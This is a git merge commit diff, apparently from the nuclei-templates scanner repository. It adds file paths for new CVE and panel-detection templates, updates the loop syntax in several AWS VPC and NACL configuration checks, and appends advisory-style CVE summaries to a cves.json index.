Merge branch 'projectdiscovery:main' into main
idealphase
GitHub
commit
85f9f6814e
|
|
@ -3,26 +3,65 @@ on:
|
|||
push:
|
||||
paths:
|
||||
- '.new-additions'
|
||||
- 'http/cves/2015/CVE-2015-4455.yaml'
|
||||
- 'http/cves/2019/CVE-2019-7139.yaml'
|
||||
- 'http/cves/2023/CVE-2023-1892.yaml'
|
||||
- 'http/cves/2023/CVE-2023-2227.yaml'
|
||||
- 'http/cves/2023/CVE-2023-27032.yaml'
|
||||
- 'http/cves/2023/CVE-2023-2948.yaml'
|
||||
- 'http/cves/2023/CVE-2023-2949.yaml'
|
||||
- 'http/cves/2023/CVE-2023-31446.yaml'
|
||||
- 'http/cves/2023/CVE-2023-32077.yaml'
|
||||
- 'http/cves/2023/CVE-2023-38964.yaml'
|
||||
- 'http/cves/2023/CVE-2023-43208.yaml'
|
||||
- 'http/cves/2023/CVE-2023-44812.yaml'
|
||||
- 'http/cves/2023/CVE-2023-4521.yaml'
|
||||
- 'http/cves/2023/CVE-2023-45375.yaml'
|
||||
- 'http/cves/2023/CVE-2023-46347.yaml'
|
||||
- 'http/cves/2023/CVE-2023-4973.yaml'
|
||||
- 'http/cves/2023/CVE-2023-5003.yaml'
|
||||
- 'http/cves/2023/CVE-2023-6389.yaml'
|
||||
- 'http/cves/2023/CVE-2023-6989.yaml'
|
||||
- 'http/cves/2024/CVE-2024-0235.yaml'
|
||||
- 'http/cves/2024/CVE-2024-0881.yaml'
|
||||
- 'http/cves/2024/CVE-2024-1183.yaml'
|
||||
- 'http/cves/2024/CVE-2024-22927.yaml'
|
||||
- 'http/cves/2024/CVE-2024-2340.yaml'
|
||||
- 'http/cves/2024/CVE-2024-23917.yaml'
|
||||
- 'http/cves/2024/CVE-2024-24131.yaml'
|
||||
- 'http/cves/2024/CVE-2024-27956.yaml'
|
||||
- 'http/cves/2024/CVE-2024-2876.yaml'
|
||||
- 'http/cves/2024/CVE-2024-3136.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31621.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31849.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31850.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31851.yaml'
|
||||
- 'http/cves/2024/CVE-2024-32399.yaml'
|
||||
- 'http/cves/2024/CVE-2024-32640.yaml'
|
||||
- 'http/cves/2024/CVE-2024-32651.yaml'
|
||||
- 'http/cves/2024/CVE-2024-33575.yaml'
|
||||
- 'http/cves/2024/CVE-2024-33724.yaml'
|
||||
- 'http/cves/2024/CVE-2024-4040.yaml'
|
||||
- 'http/cves/2024/CVE-2024-4348.yaml'
|
||||
- 'http/default-logins/crushftp/crushftp-anonymous-login.yaml'
|
||||
- 'http/default-logins/crushftp/crushftp-default-login.yaml'
|
||||
- 'http/default-logins/soplanning/soplanning-default-login.yaml'
|
||||
- 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml'
|
||||
- 'http/exposed-panels/bonobo-server-panel.yaml'
|
||||
- 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml'
|
||||
- 'http/exposed-panels/cyberchef-panel.yaml'
|
||||
- 'http/exposed-panels/femtocell-panel.yaml'
|
||||
- 'http/exposed-panels/monitorr-panel.yaml'
|
||||
- 'http/exposed-panels/openwebui-panel.yaml'
|
||||
- 'http/exposed-panels/teamforge-panel.yaml'
|
||||
- 'http/exposed-panels/tixeo-panel.yaml'
|
||||
- 'http/misconfiguration/installer/eyoucms-installer.yaml'
|
||||
- 'http/misconfiguration/installer/sabnzbd-installer.yaml'
|
||||
- 'http/misconfiguration/titannit-web-exposure.yaml'
|
||||
- 'http/vulnerabilities/titan/titannit-web-ssrf.yaml'
|
||||
- 'http/takeovers/squadcast-takeover.yaml'
|
||||
- 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml'
|
||||
- 'http/vulnerabilities/titan/titannit-web-rce.yaml'
|
||||
- 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml'
|
||||
- 'network/detection/aix-websm-detect.yaml'
|
||||
- 'network/detection/bluecoat-telnet-proxy-detect.yaml'
|
||||
workflow_dispatch:
|
||||
|
|
|
|||
|
|
@ -1,22 +1,61 @@
|
|||
http/cves/2015/CVE-2015-4455.yaml
|
||||
http/cves/2019/CVE-2019-7139.yaml
|
||||
http/cves/2023/CVE-2023-1892.yaml
|
||||
http/cves/2023/CVE-2023-2227.yaml
|
||||
http/cves/2023/CVE-2023-27032.yaml
|
||||
http/cves/2023/CVE-2023-2948.yaml
|
||||
http/cves/2023/CVE-2023-2949.yaml
|
||||
http/cves/2023/CVE-2023-31446.yaml
|
||||
http/cves/2023/CVE-2023-32077.yaml
|
||||
http/cves/2023/CVE-2023-38964.yaml
|
||||
http/cves/2023/CVE-2023-43208.yaml
|
||||
http/cves/2023/CVE-2023-44812.yaml
|
||||
http/cves/2023/CVE-2023-4521.yaml
|
||||
http/cves/2023/CVE-2023-45375.yaml
|
||||
http/cves/2023/CVE-2023-46347.yaml
|
||||
http/cves/2023/CVE-2023-4973.yaml
|
||||
http/cves/2023/CVE-2023-5003.yaml
|
||||
http/cves/2023/CVE-2023-6389.yaml
|
||||
http/cves/2023/CVE-2023-6989.yaml
|
||||
http/cves/2024/CVE-2024-0235.yaml
|
||||
http/cves/2024/CVE-2024-0881.yaml
|
||||
http/cves/2024/CVE-2024-1183.yaml
|
||||
http/cves/2024/CVE-2024-22927.yaml
|
||||
http/cves/2024/CVE-2024-2340.yaml
|
||||
http/cves/2024/CVE-2024-23917.yaml
|
||||
http/cves/2024/CVE-2024-24131.yaml
|
||||
http/cves/2024/CVE-2024-27956.yaml
|
||||
http/cves/2024/CVE-2024-2876.yaml
|
||||
http/cves/2024/CVE-2024-3136.yaml
|
||||
http/cves/2024/CVE-2024-31621.yaml
|
||||
http/cves/2024/CVE-2024-31849.yaml
|
||||
http/cves/2024/CVE-2024-31850.yaml
|
||||
http/cves/2024/CVE-2024-31851.yaml
|
||||
http/cves/2024/CVE-2024-32399.yaml
|
||||
http/cves/2024/CVE-2024-32640.yaml
|
||||
http/cves/2024/CVE-2024-32651.yaml
|
||||
http/cves/2024/CVE-2024-33575.yaml
|
||||
http/cves/2024/CVE-2024-33724.yaml
|
||||
http/cves/2024/CVE-2024-4040.yaml
|
||||
http/cves/2024/CVE-2024-4348.yaml
|
||||
http/default-logins/crushftp/crushftp-anonymous-login.yaml
|
||||
http/default-logins/crushftp/crushftp-default-login.yaml
|
||||
http/default-logins/soplanning/soplanning-default-login.yaml
|
||||
http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml
|
||||
http/exposed-panels/bonobo-server-panel.yaml
|
||||
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml
|
||||
http/exposed-panels/cyberchef-panel.yaml
|
||||
http/exposed-panels/femtocell-panel.yaml
|
||||
http/exposed-panels/monitorr-panel.yaml
|
||||
http/exposed-panels/openwebui-panel.yaml
|
||||
http/exposed-panels/teamforge-panel.yaml
|
||||
http/exposed-panels/tixeo-panel.yaml
|
||||
http/misconfiguration/installer/eyoucms-installer.yaml
|
||||
http/misconfiguration/installer/sabnzbd-installer.yaml
|
||||
http/misconfiguration/titannit-web-exposure.yaml
|
||||
http/vulnerabilities/titan/titannit-web-ssrf.yaml
|
||||
http/takeovers/squadcast-takeover.yaml
|
||||
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml
|
||||
http/vulnerabilities/titan/titannit-web-rce.yaml
|
||||
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
|
||||
network/detection/aix-websm-detect.yaml
|
||||
network/detection/bluecoat-telnet-proxy-detect.yaml
|
||||
|
|
|
|||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let NACLIDs of template.nacls){
|
||||
for(let NACLIDs of iterate(template.nacls)){
|
||||
set("naclid", NACLIDs)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -60,4 +60,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
|
||||
# digest: 490a00463044022061fa0f1f88763697856638e53fa1b78a8587487f6f691d28fdd57818ef2ab00a02204919554ac19da3748543fd6a0299c765833719eece0b93ca663319a3b75faba2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502200de3239f933f1b468292a1ac4504bc398cad18ac3aa6f2de12357bd0e8a65759022100ee901336ec076eb9058f105f779e66be7bac556e1751713419df333cca4eaddf:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let NACLIDs of template.nacls){
|
||||
for(let NACLIDs of iterate(template.nacls)){
|
||||
set("naclid", NACLIDs)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -60,4 +60,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
|
||||
# digest: 4a0a00473045022100e86f2a3e5590550fdcae3b2df793550b4ef1c178662d2231cc58bfb4d120c8c6022013a6044df37c3210f35945503f89ceae1bec5494e3d893bc4bddeef18ab5a460:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022021e25dd23124572a8f6dbe6381024f3ecb8f78907d7ba0aafa2eb9c63990e140022100ba7669b283e58bf5b0fd08f3d5501d54221fc7a48b73b088c95330ea4c633f67:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VPCIds of template.vpcid){
|
||||
for(let VPCIds of iterate(template.vpcid)){
|
||||
set("vpc", VPCIds)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -53,4 +53,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'vpc + " VPC is not using Managed NAT Gateways"'
|
||||
# digest: 4a0a00473045022100c0877797c85620a3b1a36e36908c96c828bcd0dc31d1b46eadfbad0cb57887cb0220322e780cb1d41741e04ff1fa0dfd2d35efe10a367c625bf3dfa3ef63c1297eb8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f5f55c1da4e2aaca4b9547bf032c91c95a45a559e294e66e3a04343878e6416c022100919f04f7539cccd971883f2ac51a5a40f17c588dc2bb561902f5397715facf2a:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let NACLIDs of template.nacls){
|
||||
for(let NACLIDs of iterate(template.nacls)){
|
||||
set("naclid", NACLIDs)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -62,4 +62,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."'
|
||||
# digest: 4b0a00483046022100c7ef9e19cd61d8fcfb7e1d1faf314a723142d80e0796b5101a964a2ece956abe022100c3b4d818fb5d2da95501f4e15d27dab96a8af3b6c26c7e1da86e6a8b98b2c35d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204e05c381a073d28047bdf9026597e5d331abca5011bbd8887ac323dd2b2983fb02210097ddd0dd706718f37b2c2f54820e543a9c6549883adc31296235e4b04fe04e97:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpcIds of template.VpcId){
|
||||
for(let VpcIds of iterate(template.VpcId)){
|
||||
set("vpc", VpcIds)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -60,4 +60,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"VPC endpoints for " + vpc + "are exposed."'
|
||||
# digest: 4a0a0047304502206fa64b542b8c69a54cd76e83666f0b97b830db5028eb2b684f10388b858f03c7022100a060eff71326c75b63bd7b7caa82a62b376f352503548f36ae7875e06db2b0d1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450221009cd9ca7d1c7ce5d6db43cc95291be7e509c29f9ed1c7559ee1aeb31a6579920902206e30e36ec371d03d1c5d805d349458ee43fd27bd65917e4f33050e359de8ea3b:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpcIds of template.VpcId){
|
||||
for(let VpcIds of iterate(template.VpcId)){
|
||||
set("vpc", VpcIds)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -53,4 +53,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"VPC Endpoints Not Deployed in the VPC network " + vpc'
|
||||
# digest: 4b0a00483046022100cdf521a3643f23886dee5b78e9910dbd5137467596cffd6cf43641721bdd4c8f022100ada84927f32db8433b532c73902d578b91b0721574bb78b9a37b252df5cd8beb:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220305c7cb9ef27a7249c71a3e30664db9f051b0f5438fe8ce42f2024ea91bfa24e022100e5b9e9b019adf2b1fcfd5121540efdbaf0c5fd39072523eacf41b5a50319666e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpcIds of template.VpcId){
|
||||
for(let VpcIds of iterate(template.VpcId)){
|
||||
set("vpc", VpcIds)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -55,4 +55,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Flow Logs feature is not enabled for the VPC " + vpc'
|
||||
# digest: 4a0a0047304502201fd60ad86d7fc29391c14ef3ca473cca21f6dac84b73d1a81e87898e6ccb2e73022100dce88d76e827b4874c2672ed572625753817f3fd9642c10a7ab108e2eda2b794:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022016d83c316f318298be2c514542422c1a2f3a42517ac740d4b85ca980c9bf4676022100e7af7b416817f374b418962094ee777893f8fed6b17880fea736d1eb6caa38b2:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ variables:
|
|||
|
||||
flow: |
|
||||
code(1)
|
||||
for(let VpnConnectionIds of template.vpnconnactions){
|
||||
for(let VpnConnectionIds of iterate(template.vpnconnactions)){
|
||||
set("vpnid", VpnConnectionIds)
|
||||
code(2)
|
||||
}
|
||||
|
|
@ -53,4 +53,4 @@ code:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'vpnid + " VPN tunnel is down"'
|
||||
# digest: 4a0a00473045022060f2043ba01e3483298dce863674208b94591615f73b91d4cb47e17eda4ebe310221009cfa4282260a3014b1f77a021f5d8248c4590b61f5e5904685fbcd631e178992:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402205ecec5a00e3d0521ad5a2e9ac0cebbe83e91d206c2233f683dcd750ff5b3841c02205528afb57d459d2c5075638280afcf53459f71aaeb2a5cabc21c41659d91f510:922c64590222798bb761d5b6d8e72950
|
||||
25
cves.json
25
cves.json
|
|
@ -289,6 +289,7 @@
|
|||
{"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4074.yaml"}
|
||||
{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"}
|
||||
{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"medium","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"}
|
||||
{"ID":"CVE-2015-4455","Info":{"Name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","Severity":"critical","Description":"Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-4455.yaml"}
|
||||
{"ID":"CVE-2015-4632","Info":{"Name":"Koha 3.20.1 - Directory Traversal","Severity":"high","Description":"Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4632.yaml"}
|
||||
{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"medium","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"}
|
||||
{"ID":"CVE-2015-4668","Info":{"Name":"Xsuite \u003c=2.4.4.5 - Open Redirect","Severity":"medium","Description":"Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-4668.yaml"}
|
||||
|
|
@ -773,6 +774,7 @@
|
|||
{"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-6715.yaml"}
|
||||
{"ID":"CVE-2019-6799","Info":{"Name":"phpMyAdmin \u003c4.8.5 - Local File Inclusion","Severity":"medium","Description":"phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2019/CVE-2019-6799.yaml"}
|
||||
{"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver \u003c1.2.5 - Carriage Return Line Feed Injection","Severity":"medium","Description":"Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-6802.yaml"}
|
||||
{"ID":"CVE-2019-7139","Info":{"Name":"Magento - SQL Injection","Severity":"critical","Description":"An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7139.yaml"}
|
||||
{"ID":"CVE-2019-7192","Info":{"Name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","Severity":"critical","Description":"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7192.yaml"}
|
||||
{"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7219.yaml"}
|
||||
{"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"}
|
||||
|
|
@ -1971,6 +1973,7 @@
|
|||
{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"}
|
||||
{"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"}
|
||||
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
|
||||
{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/ CVE-2023-6389.yaml"}
|
||||
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
|
||||
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
|
||||
{"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"}
|
||||
|
|
@ -2013,6 +2016,7 @@
|
|||
{"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"}
|
||||
{"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"}
|
||||
{"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"}
|
||||
{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"high","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"}
|
||||
{"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"}
|
||||
{"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"}
|
||||
{"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"}
|
||||
|
|
@ -2026,6 +2030,7 @@
|
|||
{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"}
|
||||
{"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"}
|
||||
{"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"}
|
||||
{"ID":"CVE-2023-2227","Info":{"Name":"Modoboa \u003c 2.1.0 - Improper Authorization","Severity":"critical","Description":"Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-2227.yaml"}
|
||||
{"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"}
|
||||
